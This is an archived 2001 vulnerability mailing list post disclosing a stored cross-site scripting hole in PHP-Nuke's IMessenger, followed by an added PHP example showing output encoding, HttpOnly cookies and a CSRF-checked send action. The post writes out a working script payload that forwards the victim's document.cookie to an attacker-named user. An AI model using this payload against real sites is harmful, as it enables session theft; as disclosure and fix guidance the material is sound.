Vulnerability Development mailing list archives

Serious Hole in IMessenger ( php-nuke )


From: frog frog <leseulfrog () hotmail com>
Date: 19 Dec 2001 10:02:05 -0000



IMessenger is on http://www.SERVER.com/im.php?action=Check+IM .

IM accepts the javascript.
If I send to a user or to the webmaster the script 

<s*cript>window.location.href='http://www.SERVER.com/im.php?username_to= [NICKNAME] &subject='+ document.cookie +'&message=message&action=send' ;</s*cript>

(without the '*'), he will send his cookie back to the user NICKNAME.
One can thus directly execute JavaScript on the connected user's computer.

frog-m@n
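
The fix for the behaviour reported above, as an added example that is not part of the original post and is not IMessenger or PHP-Nuke source: message fields are encoded on output, the session cookie is hidden from document.cookie, and action=send is refused unless it arrives as a POST with a per-session token. All function names are hypothetical, and the array form of session_set_cookie_params assumes PHP 7.3 or later.

```php
<?php
// Added illustration; every function name here is hypothetical.

// Pattern the post describes: stored fields are echoed as raw HTML, so a
// script element in the subject or body runs in the reader's session.
function render_message_vulnerable(array $msg): string
{
    return "<h3>{$msg['subject']}</h3><div>{$msg['message']}</div>";
}

// Hardened: encode on output so markup in a message is displayed as text.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_message(array $msg): string
{
    return '<h3>' . e($msg['subject']) . '</h3><div>'
         . nl2br(e($msg['message'])) . '</div>';
}

// Keep the session cookie out of reach of document.cookie and create the
// per-session token that the send form must carry.
function start_hardened_session(): void
{
    session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax', 'path' => '/']);
    session_start();
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }
}

// action=send changes state: accept it only as a POST with the session token,
// so a navigation to im.php?...&action=send cannot send mail as the reader.
function send_request_allowed(string $method, array $post, array $session): bool
{
    return $method === 'POST'
        && isset($post['csrf'], $session['csrf'])
        && is_string($post['csrf'])
        && hash_equals($session['csrf'], $post['csrf']);
}

// Constructed sample input; the tag is only a marker, not a payload.
if (PHP_SAPI === 'cli') {
    $msg = ['subject' => '<script>alert(1)</script>', 'message' => "line 1\nline 2"];
    echo render_message($msg), PHP_EOL;
    var_dump(send_request_allowed('GET', [], ['csrf' => 'abc']));
}
```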

